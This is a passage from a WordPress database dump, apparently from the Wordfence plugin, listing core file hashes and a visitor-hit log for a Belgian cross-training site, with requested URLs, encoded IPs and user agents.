(0x1f057e81f8e7d3d7ffdf21f82ec00209, 'wp-includes/js/tinymce/themes/advanced/skins/default/dialog.css', 1, 0x00000000000000000000000000000000, 0x0ceb1bc740c467971507606441d36d7c),
(0x37713c141edfec7d45ee6eb05cbca46d, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/buttons.png', 1, 0x00000000000000000000000000000000, 0x33b2f2e08cc3ade5254fec64c4183558),
(0x69e34f91d6da410a41fd8b37cf379834, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/items.gif', 1, 0x00000000000000000000000000000000, 0xd201498a710fc8aac6e117820b9814b7),
(0x0d321cfcabdccbb043dc180eac29498b, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/menu_arrow.gif', 1, 0x00000000000000000000000000000000, 0xe21752451a9d80e276fef7b602bdbdba),
(0x7a4f24bd040911d4f8c7ad704933f0ea, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/menu_check.gif', 1, 0x00000000000000000000000000000000, 0xc7d003885737f94768eecae49dcbca63),
(0x52850e6beb73b1eb36cd7d4d27f540f6, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/progress.gif', 1, 0x00000000000000000000000000000000, 0x50c5e3e79b276c92df6cc52caeb464f0),
(0xc722453765d385ca5d2285c29430f649, 'wp-includes/js/tinymce/themes/advanced/skins/default/img/tabs.gif', 1, 0x00000000000000000000000000000000, 0x6473bbcd0a011e9fcdd9f777ef437410),
(0xb1480d0e411a9a2234501c2d2c352ac3, 'wp-includes/js/tinymce/themes/advanced/skins/default/ui.css', 1, 0x00000000000000000000000000000000, 0x03ae09e5c5f80f0ed0fc1ebb9c2053f0),
(0x125ff922d79593af5e772e9444d29713, 'wp-includes/js/tinymce/themes/advanced/skins/highcontrast/content.css', 1, 0x00000000000000000000000000000000, 0x581e2436d2cafd2141f4a75657e06245),
(0x66472eb21a51eb2718e7ffd39de52674, 'wp-includes/js/tinymce/themes/advanced/skins/highcontrast/dialog.css', 1, 0x00000000000000000000000000000000, 0xb66af30667a23ece1521fe354331c534),
(0xae16064d65f2fd0235a6f96c6aa2ea71, 'wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ui.css', 1, 0x00000000000000000000000000000000, 0x8beb8f4a330b1294c488f435873328ef),
(0xa3bbb8d719c96649d1b0c77a06fbc1d6, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/content.css', 1, 0x00000000000000000000000000000000, 0x07708a7c49751ba1f9389079a56f2c91),
(0x0846a5a73aed55225cbb5b1809672ed2, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/dialog.css', 1, 0x00000000000000000000000000000000, 0x084f7ce623cd2965a01f65c763f88eab),
(0x3c70fe48a5853b0b3019120462a7fa6d, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg.png', 1, 0x00000000000000000000000000000000, 0x36fd9fbd748860f515df259443367163),
(0x53c1255ca39b6e7c2e11bd4178c9fdbd, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg_black.png', 1, 0x00000000000000000000000000000000, 0x9645f90b37102a3618a52be18b74b02b),
(0x1bb0a169bd800c29eedbff91d63fd184, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/button_bg_silver.png', 1, 0x00000000000000000000000000000000, 0x15fbf2b4a20dbaa86205af6764f4fee4),
(0x64b279243f7c3fcd85fd6eb461e77b74, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui.css', 1, 0x00000000000000000000000000000000, 0xaf38b0cc9a19f25f95f8776568549442),
(0xfd45e0aac9b7560eeaf1d9171ffa81bc, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui_black.css', 1, 0x00000000000000000000000000000000, 0x02a164ba69ca7d9182047b24944e1d69),
(0x65b81a67f68604dc48ab0491559e166c, 'wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui_silver.css', 1, 0x00000000000000000000000000000000, 0xf66b026fe40921b62c0b77798876760a),
(0xfd579612b06db5f9738671137b131e0f, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/content.css', 1, 0x00000000000000000000000000000000, 0x9bb2cfc47606f21365635bc442a7f3d3),
(0xba9bea14331e064fe5bf4c653765b78e, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/dialog.css', 1, 0x00000000000000000000000000000000, 0x43382eca508513e60da47f8becb0e1fd),
(0x81ed4afa3e81d56152d2610cdbf0a1e2, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/embedded.png', 1, 0x00000000000000000000000000000000, 0x1fc0d1771755f5ce441c1dd278b3a495),
(0x124d17a55e129b8f8af248a17dc6c92e, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/gallery.png', 1, 0x00000000000000000000000000000000, 0xfbcde0be231a69f57bf2ef8515a75b09),
(0x6b647a7c767b38e17d25f19288ad0b79, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/more_bug.gif', 1, 0x00000000000000000000000000000000, 0xc38cc928b95c0be49ec083648084d190),
(0x9092326a00e764cb373e6cb348e38f84, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/page_bug.gif', 1, 0x00000000000000000000000000000000, 0xea31916969e5255f353febf4b9b55a38),
(0x48618fe90c0e23a59842dd196877f481, 'wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/tabs.gif', 1, 0x00000000000000000000000000000000, 0x6473bbcd0a011e9fcdd9f777ef437410),
(0xb6d6092a75013a6123deb82f149a7744, 'wp-includes/js/tinymce/themes/advanced/source_editor.htm', 1, 0x00000000000000000000000000000000, 0xf7dcaeb5cc281bdecf6330ca986fa439),
(0x21a6219316fd34ae034dd1d76fb35987, 'wp-includes/js/tinymce/tiny_mce.js', 1, 0x00000000000000000000000000000000, 0xacb33329b9ef8aabd8bd731426803e4e),
(0x822874546c44ceac372687b34d502ec0, 'wp-includes/js/tinymce/tiny_mce_popup.js', 1, 0x00000000000000000000000000000000, 0x5a318277fedf491a0301e177a9ef10b3),
(0x476db9993a86074dc4be56c0914cd089, 'wp-includes/js/tinymce/utils/editable_selects.js', 1, 0x00000000000000000000000000000000, 0x8dd04768a81d784fbac5bb00876e808e),
(0x2ad1fe8f4c12ed6d262632fdd50a6215, 'wp-includes/js/tinymce/utils/form_utils.js', 1, 0x00000000000000000000000000000000, 0x337d7e2efe224c1c7da72d40b612d0a6),
(0xecb883fa7615c8db36e09a3b980e7e8f, 'wp-includes/js/tinymce/utils/mctabs.js', 1, 0x00000000000000000000000000000000, 0xbd062418b6a7e5007649421815021565),
(0x344149178e6e12303988860f37026360, 'wp-includes/js/tinymce/utils/validate.js', 1, 0x00000000000000000000000000000000, 0x2d73c0757ea622f65738ea71433ca8e4),
(0x49180266406ebdcdc8e63b633e961938, 'wp-includes/js/tinymce/wp-mce-help.php', 1, 0x00000000000000000000000000000000, 0x8344c631b6578c2bd1fc41a8c59164f3),
(0x856ef16273c32f548e5524db13869d8b, 'wp-includes/js/tinymce/wp-tinymce-schema.js', 1, 0x00000000000000000000000000000000, 0xdcb60a584dfa0b64a31c1ee0b67595cf),
(0xfc1127f1fa9983e6b3d77db5908d9d30, 'wp-includes/js/tinymce/wp-tinymce.js.gz', 1, 0x00000000000000000000000000000000, 0x44d281b0d84cc494e2b095a6d2202f4d),
(0xcfc2c813adc10b48d4b9f2dc66eb6be1, 'wp-includes/js/tinymce/wp-tinymce.php', 1, 0x00000000000000000000000000000000, 0xbcc3817e0e12e9517033613edc097851),
(0x1270db9ed4324e1c3c3a5aa537bb7282, 'wp-includes/js/tw-sack.js', 1, 0x00000000000000000000000000000000, 0xb989a5bd84f6ebcbc1393ec003e6e991),
(0x8bba14b0c568142bb9ab42ccc6f21dd0, 'wp-includes/js/tw-sack.min.js', 1, 0x00000000000000000000000000000000, 0xfb8bf6785e55e9e39bea552635c42a64),
(0xb275e6d83c65e7789bae40d688c2883e, 'wp-includes/js/underscore.min.js', 1, 0x00000000000000000000000000000000, 0x4f76be3bf897efbc3c44acbcbe1f4947),
(0x3ce6686ad8098e34bdbb983461d032f6, 'wp-includes/js/utils.js', 1, 0x00000000000000000000000000000000, 0xa5f4880c9cca30561e9290f0dafda128),
(0x19fc0f2655580de84c34147b9ae2d1d4, 'wp-includes/js/utils.min.js', 1, 0x00000000000000000000000000000000, 0x8b1224eaeca8bc3cddd4b9bcaab54802),
(0x5d2852aa262110e2c6313b993398ea12, 'wp-includes/js/wp-ajax-response.js', 1, 0x00000000000000000000000000000000, 0x54b536447cd644bcafa51a568be8c54e),
(0x12758c293803464739a143b0289db69a, 'wp-includes/js/wp-ajax-response.min.js', 1, 0x00000000000000000000000000000000, 0x9bf9c718c9e841007b73e1f8194857b5),
(0x93882e8f9976382d7f724ac595ed7151, 'wp-includes/js/wp-auth-check.js', 1, 0x00000000000000000000000000000000, 0xa72545bc4f0ec2779a259c397112efd5),
(0x7455d22f4473a449daa417dc737412e3, 'wp-includes/js/wp-auth-check.min.js', 1, 0x00000000000000000000000000000000, 0x616c48c103a3090c52f6fbe7e4df4e97),
(0xf4ad6ae5381dfa9cc8c48fc31aacb1f3, 'wp-includes/js/wp-backbone.js', 1, 0x00000000000000000000000000000000, 0x066899e5caeb819e6fa0422c3ce92fbd),
(0x303c9211cec5c8ff6cdabffef64aade2, 'wp-includes/js/wp-backbone.min.js', 1, 0x00000000000000000000000000000000, 0x355454f73b6cb8b46bac2dfbd1991b0a),
(0xbf99b83d563ba2178bededc24e2e4b07, 'wp-includes/js/wp-list-revisions.js', 1, 0x00000000000000000000000000000000, 0x10b8adab39fa790c52bac5c59cead9a8),
(0x4534edd766750d23523a6b211e6a6768, 'wp-includes/js/wp-list-revisions.min.js', 1, 0x00000000000000000000000000000000, 0xb4031fcf4f4279be864d4bd82f7fc46c),
(0x9f6276bec9154592ecb448d5c7e3ce84, 'wp-includes/js/wp-lists.js', 1, 0x00000000000000000000000000000000, 0xc7fa747b3e84baea1545a375324c6d12),
(0x9639b565dd45f880627fddbe6cb433a2, 'wp-includes/js/wp-lists.min.js', 1, 0x00000000000000000000000000000000, 0xfe4f0bb44f6aa5584e2969665f2e6aa6),
(0xbf23b24175490c2e46aaf92ff6a0c70f, 'wp-includes/js/wp-pointer.js', 1, 0x00000000000000000000000000000000, 0x9fb67c2257a8111e496014c2d2f3a930),
(0xeaafc787be1dc6db34cb93541f60a16b, 'wp-includes/js/wp-pointer.min.js', 1, 0x00000000000000000000000000000000, 0x368f987c644d70580097e48066c99082),
(0xa43f3f6ebfebe6e5fde55f326790b76a, 'wp-includes/js/wp-util.js', 1, 0x00000000000000000000000000000000, 0x84caa80dc10abf7a7ffd94c56cc38af1),
(0x482b80457e997d0ea73151dbf0bdaed9, 'wp-includes/js/wp-util.min.js', 1, 0x00000000000000000000000000000000, 0xf96c33819e26e9187e5d23bf2de399bc),
(0x9ab07774f248a9ebe1172d739300c26e, 'wp-includes/js/wplink.js', 1, 0x00000000000000000000000000000000, 0x3e14409d11ab45bb0f2c90e60978384f),
(0xdf0fe0d2c12289bb96becd63296adb22, 'wp-includes/js/wplink.min.js', 1, 0x00000000000000000000000000000000, 0xc9d7f5943044ff3a3a341c077ae58a42),
(0xfda9d57f27e68042e2088aad37531dc2, 'wp-includes/js/zxcvbn-async.js', 1, 0x00000000000000000000000000000000, 0x21a0938b5ced5349b5071d0c9bfe6923),
(0x4c28cafda26ef8395b1232c04336e59a, 'wp-includes/js/zxcvbn-async.min.js', 1, 0x00000000000000000000000000000000, 0x3196e9b61f703909e139ce7e049a7ffd),
(0x4af2be81acb4ca4f68d3fdd07344d8be, 'wp-includes/js/zxcvbn.min.js', 1, 0x00000000000000000000000000000000, 0x01bae5101bd40c4d24029dbfa20373d2),
(0xa0e0d196dd71dde453474b0f791828fe, 'wp-includes/kses.php', 1, 0x00000000000000000000000000000000, 0x7647f3450565baa901b716d87bca82ba),
(0x10c9e8eb133a7f6da1b05bdda2af3a23, 'wp-includes/l10n.php', 1, 0x00000000000000000000000000000000, 0x578576a435694bef402b5f87c221f494),
(0xcbef1d76ed452cbf2d4fe47bcf01ba96, 'wp-includes/link-template.php', 1, 0x00000000000000000000000000000000, 0x6296f624c3db0f59985602b1007a4ea8),
(0x5f6a18f5f0875fb1a82fd4ccd679d3b1, 'wp-includes/load.php', 1, 0x00000000000000000000000000000000, 0xe65f33b6f5ae2ad871a06ed6b1fc4c48),
(0x4436066dcb658e727b704be84f181092, 'wp-includes/locale.php', 1, 0x00000000000000000000000000000000, 0x58dc2e217d7dcfacffce028e33672076),
(0x61c6c50383c9fb286de04542fd086cc9, 'wp-includes/media-template.php', 1, 0x00000000000000000000000000000000, 0x227bcf13a6ebf633c1a2695e5690b4ab),
(0x297bf46a572d5f80513d3fed476cd2a2, 'wp-includes/media.php', 1, 0x00000000000000000000000000000000, 0xa7268b2fd36d100e23523f1696fdc64d),
(0x7fdb4bfb51f07d1455263b2698efd851, 'wp-includes/meta.php', 1, 0x00000000000000000000000000000000, 0x3e92282539d62b74d81b4fc2a89d86a5),
(0x1dd367b99b498621d9add1c7d6075fc6, 'wp-includes/ms-blogs.php', 1, 0x00000000000000000000000000000000, 0x4c5a6e7bb9f7699445ae707eae522bc8),
(0x6d41e7f059b7e0cac0ae52627cde538e, 'wp-includes/ms-default-constants.php', 1, 0x00000000000000000000000000000000, 0x98d0c6799adf80ef92ee37b19c7a38eb),
(0xa4071e2edd814215bec0784b1291598c, 'wp-includes/ms-default-filters.php', 1, 0x00000000000000000000000000000000, 0xae88f22b2632ff6db8f93d55957fd617),
(0xa85bc26ec50f477bc3f927bea2713a9b, 'wp-includes/ms-deprecated.php', 1, 0x00000000000000000000000000000000, 0x6a70302a6b7e11866086b486afa1426c),
(0xebadb70de710217a7d4d4c9d114b8145, 'wp-includes/ms-files.php', 1, 0x00000000000000000000000000000000, 0x5dbc79c3affe3cd17220d44ceb467c01),
(0xbc76259f7f948c53b45bbfccaaa3d1be, 'wp-includes/ms-functions.php', 1, 0x00000000000000000000000000000000, 0xb8a385a1ba4a0a50f8823e0b6d73f3e2),
(0xc35f16b497a76a5358e032ce1951513d, 'wp-includes/ms-load.php', 1, 0x00000000000000000000000000000000, 0x46cb6f8eba6cb2d0a3fffdb639bf1253),
(0x7f6a2686c25efbccf88c62b3f4048c98, 'wp-includes/ms-settings.php', 1, 0x00000000000000000000000000000000, 0x36e492267c62cb74a38c6da2c83d9f7d),
(0xc50faa117b41b8ea6d6df910df2a9d4b, 'wp-includes/nav-menu-template.php', 1, 0x00000000000000000000000000000000, 0xf145b186d085ab4487bc391042b43b3f),
(0xa15bf6486e5b50d62e7ebdf0df46557c, 'wp-includes/nav-menu.php', 1, 0x00000000000000000000000000000000, 0xb57dfbdc29adc1da3dcd0482a1c2d75e),
(0xb64d52b2e66cc442109c07151146a575, 'wp-includes/option.php', 1, 0x00000000000000000000000000000000, 0x95ab8239a7b6829ee1b3f773b3374eee),
(0x4e7cfec2874ad0b2aa7a6ed7f6117377, 'wp-includes/pluggable-deprecated.php', 1, 0x00000000000000000000000000000000, 0x637c9aca793fe3c38b6b2465084e7ab2),
(0x6830582dc869ffbbd5e18d5ecc476038, 'wp-includes/pluggable.php', 1, 0x00000000000000000000000000000000, 0x8962210a16612f1cc14b15246cb7764b),
(0xe4f61b003087f9719fc48a4e792994d4, 'wp-includes/plugin.php', 1, 0x00000000000000000000000000000000, 0xeb1e3e75d550f9154f576e40df7f5a85),
(0x0ecc200e87eca10c4311aa5907968ef1, 'wp-includes/pomo/entry.php', 1, 0x00000000000000000000000000000000, 0xeb148c7d02db4c96c7bcc6a2d276c22e),
(0x3438b2155674d412ba9a2b5e125807f4, 'wp-includes/pomo/mo.php', 1, 0x00000000000000000000000000000000, 0xc7aea72d10f387a63f768981483b6d57),
(0xaae65b4bbaeee6628ec4da320c3810b7, 'wp-includes/pomo/po.php', 1, 0x00000000000000000000000000000000, 0xcb909cc0b3e3999d344b9f37f3bcc6a0),
(0x9a31573b639fb69ab8b04ef1c022ef75, 'wp-includes/pomo/streams.php', 1, 0x00000000000000000000000000000000, 0x2bff9b99c510536c517e72b2d1f2a731),
(0xa7d31d923fda9fa345bfce14b6245046, 'wp-includes/pomo/translations.php', 1, 0x00000000000000000000000000000000, 0x99a81ea59de88663cbcdae4c96b57588),
(0x9461b17455da71b65e21e430c6a36c81, 'wp-includes/post-formats.php', 1, 0x00000000000000000000000000000000, 0xde6b1c6829e6ffd172b40c5ea536fecc),
(0x4dfc90c149824dd4effcc0724490f52d, 'wp-includes/post-template.php', 1, 0x00000000000000000000000000000000, 0xe6909c1a952f4ac2dc29b98a766db897),
(0xc3e16959969086851e007f0a52299684, 'wp-includes/post-thumbnail-template.php', 1, 0x00000000000000000000000000000000, 0x6fba6da4b20d5df29ed8d04694b4bcb3),
(0xab88b030116a886cb5530713d3fd4bf2, 'wp-includes/post.php', 1, 0x00000000000000000000000000000000, 0x729d7af1f17dd076756317e869e9c69d),
(0x8e20e94124dba46643814ef699330737, 'wp-includes/query.php', 1, 0x00000000000000000000000000000000, 0xe6f4f0ee1fbf4b0113300e099003d920),
(0x9e452d6ae0ca316aeca3ca0d02cf4593, 'wp-includes/registration-functions.php', 1, 0x00000000000000000000000000000000, 0x5f3f3cb7c6d126548d7848dd5893434c),
(0x355c683e0cf3ce77091d9d97870c4ecb, 'wp-includes/registration.php', 1, 0x00000000000000000000000000000000, 0x7198cf8d485e8ddcb2b3bb49a6d069da),
(0x5f02b0000cdfc56420954d507edbeb44, 'wp-includes/revision.php', 1, 0x00000000000000000000000000000000, 0x4f5eb2ffb85bc5a677ad4138a7b38aeb),
(0x29be4f7a3d9c75a98717eea308c4cbb7, 'wp-includes/rewrite.php', 1, 0x00000000000000000000000000000000, 0x30925983640333d4f3bc6fca104f7516),
(0xfee0a203bf77039bf1190827a2362907, 'wp-includes/rss-functions.php', 1, 0x00000000000000000000000000000000, 0x67b3b8bbb2d4166c5da5346a306c3d9d),
(0x82a7ace3ed41bc13cef28c311a853ba4, 'wp-includes/rss.php', 1, 0x00000000000000000000000000000000, 0x2a05317e2cb2a8904896cb6dfe5ba11d),
(0x39977d20425ebfb23f09eb9d22eb7f0c, 'wp-includes/script-loader.php', 1, 0x00000000000000000000000000000000, 0xd96fe9b1b939cc3baebf18b34e6d0df3),
(0x566e650221ca7a3075310e3fac12bf03, 'wp-includes/shortcodes.php', 1, 0x00000000000000000000000000000000, 0x1196be3286f45b56c160aefa09d05565),
(0xefd15818123d55a117706670be80c15a, 'wp-includes/taxonomy.php', 1, 0x00000000000000000000000000000000, 0xbf8d695c1a77ee3e4ca3a5e33928d363),
(0x843a7f2b5bf5b967bea6435addd8f392, 'wp-includes/template-loader.php', 1, 0x00000000000000000000000000000000, 0xf01922f37799d1dd0901d04387079e74),
(0x883a3d8f25c6cce2bef9a00f4dd4dbb5, 'wp-includes/template.php', 1, 0x00000000000000000000000000000000, 0xe667747bdba6063b27d788a013ebad77),
(0x87b5609aa46b590b4c5fafbc08682527, 'wp-includes/theme-compat/comments-popup.php', 1, 0x00000000000000000000000000000000, 0xd6893ba74644c2201351bd1ae95f182a),
(0x3e68d0a9ec58140c582aff763195a9b9, 'wp-includes/theme-compat/comments.php', 1, 0x00000000000000000000000000000000, 0xa22c16751ce7dee44c818570c69649fa),
(0xfe7f5119d6bf361193c87971e4a23838, 'wp-includes/theme-compat/footer.php', 1, 0x00000000000000000000000000000000, 0x5a500e9cb907afa160cf5f7eaaadbc7b),
(0x1f4ce41fe56250de2d4906d7ad316680, 'wp-includes/theme-compat/header.php', 1, 0x00000000000000000000000000000000, 0x3fd3b556981db4e167346367d1f4ee20),
(0xe330973bea2d2cd3411f15de4579e60e, 'wp-includes/theme-compat/sidebar.php', 1, 0x00000000000000000000000000000000, 0x8e5f9d8acbd05cc2781c65462cf545e1),
(0x931d58e88156d7984f7c387d069a8082, 'wp-includes/theme.php', 1, 0x00000000000000000000000000000000, 0x214a3a37a3eb950b0173e0aa2bc8aeb0),
(0xf6caed862ba202039ac771c97057a3c3, 'wp-includes/update.php', 1, 0x00000000000000000000000000000000, 0xae1cf838b9f87563803abe916a9d1eda),
(0x6bbdfa0f42cb9ee3623d790386da1e12, 'wp-includes/user.php', 1, 0x00000000000000000000000000000000, 0x2c9dd383da85057ca4697bbae4fa33d5),
(0x672b797289e4d0718480f68044a9b42f, 'wp-includes/vars.php', 1, 0x00000000000000000000000000000000, 0x25c7e23b0a3a461ebc9d0578c3fe842b),
(0x355aaccce4e053cebce376d960369739, 'wp-includes/version.php', 1, 0x00000000000000000000000000000000, 0x1f4fbb00458e89eee1d46aa429edfdb8),
(0x53db0e1cca26eb617a38f64ad8b639a7, 'wp-includes/widgets.php', 1, 0x00000000000000000000000000000000, 0xc8eddb25c170c4bb6239174646c71517),
(0xf840a8d2ea7342303c807b6cb6339fd1, 'wp-includes/wlwmanifest.xml', 1, 0x00000000000000000000000000000000, 0xb23aa270acc2240a9a22082550a8680c),
(0x4cc2118a651fa17422706328099265c7, 'wp-includes/wp-db.php', 1, 0x00000000000000000000000000000000, 0x9ca15c877232fec89b95ad56bd3c1d55),
(0x28ef5ea6334e12bd9aa99391a2330812, 'wp-includes/wp-diff.php', 1, 0x00000000000000000000000000000000, 0xd3fea21a209ef989c55f0f57f31f17d1),
(0x9aff995e90078f27bd7188c2ee3085ea, 'wp-links-opml.php', 1, 0x00000000000000000000000000000000, 0xc463c9c7fe769e018d496cda106d6697),
(0x8f249d811bbbc0aa6ab6589e5d29443a, 'wp-load.php', 1, 0x00000000000000000000000000000000, 0xebdc1b87de5f43f8f9b8a17515ea9a53),
(0xdd11ba0d00464ac8e49642e1de65e712, 'wp-login.php', 1, 0x00000000000000000000000000000000, 0x5b265f6d61333fa97aa858d6e2aa6699),
(0xb48333a0542e5e9dc6993cde0ff7f814, 'wp-mail.php', 1, 0x00000000000000000000000000000000, 0x5b9c146d6a596b378d5af8833c8c6f8f),
(0x3b31d18b2312c1595f4e0f1c84a574f7, 'wp-settings.php', 1, 0x00000000000000000000000000000000, 0xb8b62fb7a9d829a3bcbda1f5181f02b9),
(0x168c1c2c903423a28528e7230c170614, 'wp-signup.php', 1, 0x00000000000000000000000000000000, 0x8684024ef2110bcfec7080e07d654c52),
(0x6fe3ae9a2d01d73b3f583a8ffb70d2a1, 'wp-trackback.php', 1, 0x00000000000000000000000000000000, 0x8bad2451f59b5b91bb54a06a1b6cb9fd),
(0x34da829cd94c24bc2c4b5b9c75cce284, 'xmlrpc.php', 1, 0x00000000000000000000000000000000, 0x40d02fd01852287888fb0acfec5b9fb7);

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfHits`
--

CREATE TABLE `wp_wfHits` (
  `id` int(10) UNSIGNED NOT NULL,
  `ctime` double(17,6) UNSIGNED NOT NULL,
  `IP` int(10) UNSIGNED NOT NULL,
  `jsRun` tinyint(4) DEFAULT '0',
  `is404` tinyint(4) NOT NULL,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) UNSIGNED NOT NULL,
  `newVisit` tinyint(3) UNSIGNED NOT NULL,
  `URL` text,
  `referer` text,
  `UA` text
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--
-- Déchargement des données de la table `wp_wfHits`
--

INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(70969, 1493425644.879982, 3024883471, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70968, 1493421673.885154, 2509963089, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(70967, 1493419119.368628, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70966, 1493417837.907161, 2954838202, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(70965, 1493417831.334921, 2509962920, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; U; Android 4.2.2; fr-fr; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(70964, 1493417751.729219, 2509962920, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; U; Android 4.2.2; fr-fr; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(70963, 1493417713.155070, 2509962920, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; U; Android 4.2.2; fr-fr; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(70962, 1493417679.521672, 2509962920, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; U; Android 4.2.2; fr-fr; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(70961, 1493417677.090224, 2509962920, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; U; Android 4.2.2; fr-fr; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(70960, 1493412387.081301, 3323226906, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-json/wp/v2/posts/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(70959, 1493411907.717646, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70958, 1493411903.223453, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70957, 1493411248.476326, 1374824443, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7'),
(70956, 1493411246.636903, 1374824443, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7'),
(70955, 1493396465.792722, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70954, 1493396461.864020, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70953, 1493396457.735232, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70952, 1493395195.104352, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/synoptic/style.css', 'http://crosstrainingcenter.be/wp-content/themes/synoptic/style.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70951, 1493392805.764485, 629871318, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
(70950, 1493392803.178305, 3287437334, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/abpout', 'http://crosstrainingcenter.be/abpout', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)'),
(70948, 1493392263.551220, 629871318, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
(70949, 1493392599.929818, 629871318, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
(70947, 1493391705.196993, 629871318, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'SafeDNSBot (https://www.safedns.com/searchbot)'),
